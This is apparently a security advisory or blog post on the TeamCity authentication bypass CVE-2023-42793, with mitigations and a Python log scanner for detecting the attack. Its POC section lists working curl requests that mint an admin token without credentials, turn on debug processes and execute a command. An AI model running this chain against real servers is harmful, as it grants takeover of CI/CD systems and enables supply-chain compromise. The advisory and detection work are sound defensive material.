Jetbrains TeamCity Auth Bypass and RCE (CVE-2023-42793)

Vulnerable Version

Version 2023.05.3 and below

Fixed Version

Update to the latest version (2023.05.4 or later)

Base Score

9.8 Critical

Vendor Description:-

JetBrains TeamCity is a robust continuous integration and continuous deployment (CI/CD) server that helps developers and DevOps teams automate software development, testing, and delivery. It improves the development lifecycle by conducting builds, tests, and deploying apps in an efficient and repeatable manner. TeamCity connects with a wide range of tools and technologies, including version control systems like Git, issue trackers, and cloud platforms, making it extremely adaptable. It offers a full build history, real-time monitoring, and customisable processes to boost collaboration and efficiency. Overall, TeamCity is frequently used to ensure shorter release cycles, higher software quality, and improved delivery pipelines.

CVE-2023-42793 Description:-

CVE-2023-42793 in JetBrains TeamCity is an authentication bypass. The flaw is in the “RequestInterceptors.java” file and is caused by the wildcard route “/**/RPC2” in the “myPreHandlingDisabled” PathSet [3]. If an inbound HTTP request matches the wildcard route “/**/RPC2”, the TeamCity server skips its authentication checks for that request.

Adversaries exploit this vulnerability to obtain an access token by sending an HTTP POST request to the endpoint “/app/rest/users/id:1/tokens/RPC2”. Here “RPC2” is simply the name the adversary gives the requested token; because the path ends in /RPC2, the request is not authenticated, and the server issues a token with the rights of the user with ID 1, the administrator account that is always created during installation.

JetBrains has issued a patch for the vulnerability, but patching only prevents future exploitation. If the server was reachable and unpatched before the fix was applied, security teams should threat-hunt for prior compromise.

Impact:-

Here are some significant effects of CVE-2023-42793 on JetBrains TeamCity:

  • Full Administrative Access – Because user ID 1 is always the default administrator account, attackers can leverage this weakness to generate an admin-level authentication token without logging in.
  • Remote Code Execution (RCE) – With administrative credentials, adversaries can upload malicious build configurations or plugins, causing arbitrary instructions to be executed on the TeamCity server.
  • Supply Chain Compromise – TeamCity is a CI/CD platform; once penetrated, attackers can insert backdoors into software builds, causing downstream supply chain assaults.
  • Credential and data theft – Attackers can take stored credentials (API keys, secrets, tokens) and sensitive project data from TeamCity, allowing for further lateral movement.

Mitigations:-

The risk from this vulnerability can be reduced or eliminated by:

  • Update TeamCity to version 2023.05.4 or later.
  • If upgrading is not immediately possible, evaluate JetBrains’ security patch plugin for this vulnerability.
  • Use up-to-date IPS signatures to filter network traffic.
  • If none of the above is possible, consider taking the server offline until it can be patched.

POC

The core problem is that no request whose path ends in /RPC2 is authenticated. Sending the first request below creates a REST API token named RPC2 for user ID 1 without any credentials. With that token, the second request enables debug mode by writing rest.debug.processes.enable=true to internal.properties. Once debug mode is active, the third request runs an arbitrary command through the debug processes endpoint:

Step 1:-
curl -X POST "http://192.168.146.137:8111/app/rest/users/id:1/tokens/RPC2"

Step 2:-
curl -X POST "http://192.168.146.137:8111/admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true" -H "Authorization: Bearer <TOKEN_FROM_STEP_1>"

Step 3:-
curl -X POST "http://192.168.146.137:8111/app/rest/debug/processes?exePath=id" -H "Authorization: Bearer <TOKEN_FROM_STEP_1>"

Finally, delete the API token created in step 1:

Step 4:- Delete token
curl -X DELETE "http://192.168.146.137:8111/app/rest/users/id:1/tokens/RPC2" -H "Authorization: Bearer <TOKEN_FROM_STEP_1>"
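Defenders hunting for this chain can look for the same three request patterns in the web-server or reverse-proxy access logs in front of TeamCity. The following is an added example (my code, not from the original post or from JetBrains): it scans constructed sample log lines for the /RPC2 suffix on the token endpoint, the internal.properties edit and the debug processes call, and reports any source that shows the full chain. The combined-log layout and the indicator labels are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined-log layout, not real TeamCity logs).
SAMPLE_LOG = """\
10.0.0.5 - - [27/Sep/2023:10:01:02 +0000] "GET /login.html HTTP/1.1" 200 512
10.0.0.9 - - [27/Sep/2023:10:02:10 +0000] "POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1" 200 231
10.0.0.9 - - [27/Sep/2023:10:02:15 +0000] "POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1" 200 0
10.0.0.9 - - [27/Sep/2023:10:02:20 +0000] "POST /app/rest/debug/processes?exePath=id HTTP/1.1" 200 88
10.0.0.9 - - [27/Sep/2023:10:03:00 +0000] "DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1" 204 0
"""

LINE_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify(method, target):
    """Return indicator labels for one request ([] when nothing matches)."""
    url = urlsplit(target)
    path = unquote(url.path)
    query = {k: v[0] for k, v in parse_qs(url.query).items()}  # parse_qs already decodes %xx
    hits = []
    # 1. Any path ending in /RPC2 (other than the XML-RPC endpoint itself, assumed legitimate) skips
    #    the pre-handling interceptors; the tokens endpoint under /app/rest/users/ is the CVE pattern.
    if path.endswith("/RPC2") and path != "/RPC2":
        hits.append("auth-bypass-suffix")
        if re.fullmatch(r"/app/rest/users/id:\d+/tokens/RPC2", path):
            hits.append(f"token-{method.lower()}")
    if path == "/admin/dataDir.html" and query.get("action") == "edit" and query.get("fileName", "").endswith("internal.properties"):  # step 2
        hits.append("internal-properties-edit")
        if "rest.debug.processes.enable=true" in query.get("content", ""):
            hits.append("debug-processes-enabled")
    if path == "/app/rest/debug/processes":  # step 3: command execution via the debug REST endpoint
        hits.append("debug-process-exec")
    return hits

def scan(log_text):
    """Return (source, method, path, indicators) for every suspicious request, in log order."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and (hits := classify(m["method"], m["target"])):
            findings.append((m["src"], m["method"], unquote(urlsplit(m["target"]).path), hits))
    return findings

def chained_sources(findings):
    """Sources showing the full chain (bypass -> debug enabled -> exec): the highest-confidence alert."""
    seen = {}
    for src, _, _, hits in findings:
        seen.setdefault(src, set()).update(hits)
    needed = {"auth-bypass-suffix", "debug-processes-enabled", "debug-process-exec"}
    return sorted(src for src, hits in seen.items() if needed <= hits)
```

A single hit on the /RPC2 suffix is worth triage on its own, since legitimate clients have no reason to append it to the tokens endpoint.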

